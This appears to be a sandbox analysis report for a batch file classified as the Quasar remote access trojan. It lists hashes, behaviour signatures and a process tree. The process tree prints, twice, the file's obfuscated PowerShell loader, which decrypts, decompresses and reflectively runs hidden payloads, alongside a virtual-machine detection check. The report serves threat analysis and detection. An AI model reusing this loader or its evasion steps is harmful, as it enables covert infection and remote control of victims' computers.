Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
55s -
max time network
52s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
02/01/2025, 23:05
General
-
Target
Loli.bat
-
Size
7.2MB
-
MD5
d266b84f245e8de76e05e762e3b7cfca
-
SHA1
ed75a3413e35ff95bb01a4027f38e2a0e22e2cae
-
SHA256
26a49de957b5598e0c2e8d6d41d89320d3a363d9e6e4606237d2d487db6adaad
-
SHA512
b19446cba7f08521accd3d8ab05312d454933e3e87c7b33b9f9c2d3f484e54f6ff4fb989649d6f467f7b2a44c7d7571d5e06348b7872f4ad8acceaad4ae95b4f
-
SSDEEP
49152:2Ispe9WTFYTG/p+hBJhMIZHEUaS9Yvg/mAi+v16h18WqW18EfCfKNHppku4O3v9y:h
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
encryption_key
31387DAD824ED1DBDC13F28AAF68CFB9BAC9E25E
-
reconnect_delay
3000
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Blocklisted process makes network request 8 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 4 IoCs
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 48 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{eabc6fb1-153b-4fed-a5c2-81e3942b67f0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5cc4ba0c-4efc-464e-837b-95c8ca70e20e}2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"3⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function nujd($lhNe){ Invoke-Expression -InformationAction Ignore '$COdX=[PoSPoyPostPoePomPo.SPoePocPourPoitPoyPo.PoCPoryPopPotPoogPorPoaPopPohPoyPo.APoePosPo]Po:Po:CPorePoatPoePo(Po);'.Replace('Po', ''); Invoke-Expression -WarningAction Inquire -Debug '$COdX.MrLorLdrLe=rL[rLSrLysrLtrLerLm.rLSerLcrLurLrrLitrLyrL.rLCrrLyrLprLtrLorLgrLrarLprLhrLyrL.rLCirLphrLerrLMrLorLdrLerL]:rL:rLCBrLC;'.Replace('rL', ''); Invoke-Expression -Verbose -Debug '$COdX.PiHaiHdiHdiiHniHgiH=[iHSiHyiHstiHemiH.iHSiHeiHcuiHriHiiHtyiH.iHCiHriHyiHpiHtoiHgiHriHaiHpiHhyiH.PiHadiHdiHiiHniHgiHMoiHdiHe]iH::iHPKiHCiHS7iH;'.Replace('iH', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$COdX.KNkeNkyNk=[NkSNkyNkstNkeNkmNk.CNkonNkvNkeNkrNkt]Nk:Nk:NkFrNkoNkmNkBNkaNksNke6Nk4NkSNktNkrNkinNkg("oNkKNkiNkLoNkINkeNk3DNk+Nk3NkcmNkfINkCNkANkdNkZbNkFNkCNkX8Nk1NkyNkzNkLNkmNkB0Nk0Nk0Nk3NkvNkc/Nk4BNkWhNkJNkMNk=");'.Replace('Nk', ''); Invoke-Expression -InformationAction Ignore -Debug '$COdX.IhWVhW=hW[ShWyhWshWtehWmhW.hWCohWnvhWehWrhWthW]:hW:hWFhWrohWmhWBhWahWshWehW64hWShWthWrhWihWnghW("ThWchWOhWIZhWbhWwhWWChWrhWAhWt/hWtAhW0hW1hWzhW2shWUhWAhW==hW");'.Replace('hW', ''); $XgMn=$COdX.CreateDecryptor(); $eBBZ=$XgMn.TransformFinalBlock($lhNe, 0, $lhNe.Length); $XgMn.Dispose(); $COdX.Dispose(); $eBBZ;}function azYi($lhNe){ Invoke-Expression -Verbose '$BinA=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom(,$lhNe);'.Replace('ao', ''); Invoke-Expression -InformationAction Ignore '$sddt=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom;'.Replace('ao', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$Snik=NiEeiEwiE-OiEbiEjiEeciEtiE iESyiEstiEeiEmiE.iEIOiE.iECiEomiEpiEriEeiEsiEsiEioiEniE.iEGiEZiEipiEStiEreiEaiEm($BinA, [iEIiEOiE.CiEoiEmiEpriEeiEsiEsiiEoniE.iECiEoiEmpiEriEeiEssiEiiEoiEniEMiEoiEdeiE]iE:iE:iEDiEeciEomiEpriEeiEsiEs);'.Replace('iE', ''); $Snik.CopyTo($sddt); $Snik.Dispose(); $BinA.Dispose(); $sddt.Dispose(); $sddt.ToArray();}function nkjd($lhNe,$pDlr){ Invoke-Expression -Debug -Verbose '$GhnL=[puSpuypustpuepumpu.Rpuepufpulepuctpuipuopunpu.Apuspuspuempubpulpuypu]pu:pu:Lpuopuapud([byte[]]$lhNe);'.Replace('pu', ''); Invoke-Expression -InformationAction Ignore '$VpgC=$GhnL.EUUnUUtUUryUUPUUoUUinUUtUU;'.Replace('UU', ''); Invoke-Expression -WarningAction Inquire '$VpgC.WGIWGnWGvoWGkWGeWG($WGnWGuWGllWG, $pDlr);'.Replace('WG', '');}$ocvt = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $ocvt;$acGn=[System.IO.File]::ReadAllText($ocvt).Split([Environment]::NewLine);foreach ($fvZg in $acGn) { if ($fvZg.StartsWith('DsrMx')) { $wllg=$fvZg.Substring(5); break; }}$ykOK=[string[]]$wllg.Split('\');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$CSX = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$fPU = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore '$aXY = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');nkjd $CSX $null;nkjd $fPU $null;nkjd $aXY (,[string[]] (''));3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"5⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function nujd($lhNe){ Invoke-Expression -InformationAction Ignore '$COdX=[PoSPoyPostPoePomPo.SPoePocPourPoitPoyPo.PoCPoryPopPotPoogPorPoaPopPohPoyPo.APoePosPo]Po:Po:CPorePoatPoePo(Po);'.Replace('Po', ''); Invoke-Expression -WarningAction Inquire -Debug '$COdX.MrLorLdrLe=rL[rLSrLysrLtrLerLm.rLSerLcrLurLrrLitrLyrL.rLCrrLyrLprLtrLorLgrLrarLprLhrLyrL.rLCirLphrLerrLMrLorLdrLerL]:rL:rLCBrLC;'.Replace('rL', ''); Invoke-Expression -Verbose -Debug '$COdX.PiHaiHdiHdiiHniHgiH=[iHSiHyiHstiHemiH.iHSiHeiHcuiHriHiiHtyiH.iHCiHriHyiHpiHtoiHgiHriHaiHpiHhyiH.PiHadiHdiHiiHniHgiHMoiHdiHe]iH::iHPKiHCiHS7iH;'.Replace('iH', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$COdX.KNkeNkyNk=[NkSNkyNkstNkeNkmNk.CNkonNkvNkeNkrNkt]Nk:Nk:NkFrNkoNkmNkBNkaNksNke6Nk4NkSNktNkrNkinNkg("oNkKNkiNkLoNkINkeNk3DNk+Nk3NkcmNkfINkCNkANkdNkZbNkFNkCNkX8Nk1NkyNkzNkLNkmNkB0Nk0Nk0Nk3NkvNkc/Nk4BNkWhNkJNkMNk=");'.Replace('Nk', ''); Invoke-Expression -InformationAction Ignore -Debug '$COdX.IhWVhW=hW[ShWyhWshWtehWmhW.hWCohWnvhWehWrhWthW]:hW:hWFhWrohWmhWBhWahWshWehW64hWShWthWrhWihWnghW("ThWchWOhWIZhWbhWwhWWChWrhWAhWt/hWtAhW0hW1hWzhW2shWUhWAhW==hW");'.Replace('hW', ''); $XgMn=$COdX.CreateDecryptor(); $eBBZ=$XgMn.TransformFinalBlock($lhNe, 0, $lhNe.Length); $XgMn.Dispose(); $COdX.Dispose(); $eBBZ;}function azYi($lhNe){ Invoke-Expression -Verbose '$BinA=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom(,$lhNe);'.Replace('ao', ''); Invoke-Expression -InformationAction Ignore '$sddt=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom;'.Replace('ao', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$Snik=NiEeiEwiE-OiEbiEjiEeciEtiE iESyiEstiEeiEmiE.iEIOiE.iECiEomiEpiEriEeiEsiEsiEioiEniE.iEGiEZiEipiEStiEreiEaiEm($BinA, [iEIiEOiE.CiEoiEmiEpriEeiEsiEsiiEoniE.iECiEoiEmpiEriEeiEssiEiiEoiEniEMiEoiEdeiE]iE:iE:iEDiEeciEomiEpriEeiEsiEs);'.Replace('iE', ''); $Snik.CopyTo($sddt); $Snik.Dispose(); $BinA.Dispose(); $sddt.Dispose(); $sddt.ToArray();}function nkjd($lhNe,$pDlr){ Invoke-Expression -Debug -Verbose '$GhnL=[puSpuypustpuepumpu.Rpuepufpulepuctpuipuopunpu.Apuspuspuempubpulpuypu]pu:pu:Lpuopuapud([byte[]]$lhNe);'.Replace('pu', ''); Invoke-Expression -InformationAction Ignore '$VpgC=$GhnL.EUUnUUtUUryUUPUUoUUinUUtUU;'.Replace('UU', ''); Invoke-Expression -WarningAction Inquire '$VpgC.WGIWGnWGvoWGkWGeWG($WGnWGuWGllWG, $pDlr);'.Replace('WG', '');}$ocvt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $ocvt;$acGn=[System.IO.File]::ReadAllText($ocvt).Split([Environment]::NewLine);foreach ($fvZg in $acGn) { if ($fvZg.StartsWith('DsrMx')) { $wllg=$fvZg.Substring(5); break; }}$ykOK=[string[]]$wllg.Split('\');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$CSX = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$fPU = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore '$aXY = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');nkjd $CSX $null;nkjd $fPU $null;nkjd $aXY (,[string[]] (''));5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\DjGPQo.exe"C:\Windows\$nya-onimai2\DjGPQo.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f9473b5a292735eb63388f024419f671
SHA1a313f974a2d7f8266f68c452a853cde8dba3a28d
SHA2565a53dfd3670931d8d5610943c0e860ae2518298a889b803b628aa46f80ade07e
SHA51277f951fe0f51c4a5b952771bdd4f5a6f295b2508da96cd3960f63932cfd280f8cb290ffcbca12533d36945f549d4de037654af9e0e1caf90a0588dd601a6601e
-
Filesize
1KB
MD5e1c15d7791b65536820509298e68d8f4
SHA1617db44f9b0d82f5c9918f98e96ee94179a29b11
SHA256725b5041d79023220710218740241cd9edda721245ab283b33c0d13854d4984f
SHA51282c19b76e69b91af07d631b9e17f9f1632b90ca23c670076ee2190bf8f960313f0b2e3856f177f50e639e3f479fd809755b73a0c333365fc8532239f20bf9082
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.2MB
MD5d266b84f245e8de76e05e762e3b7cfca
SHA1ed75a3413e35ff95bb01a4027f38e2a0e22e2cae
SHA25626a49de957b5598e0c2e8d6d41d89320d3a363d9e6e4606237d2d487db6adaad
SHA512b19446cba7f08521accd3d8ab05312d454933e3e87c7b33b9f9c2d3f484e54f6ff4fb989649d6f467f7b2a44c7d7571d5e06348b7872f4ad8acceaad4ae95b4f
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
144KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
56KB
-
Filesize
3.4MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
756KB
-
Filesize
2.0MB
-
Filesize
4.3MB
-
Filesize
232KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
280KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
756KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
2.0MB
-
Filesize
7.4MB
-
Filesize
1.8MB
-
Filesize
712KB
-
Filesize
320KB
-
Filesize
72KB
-
Filesize
240KB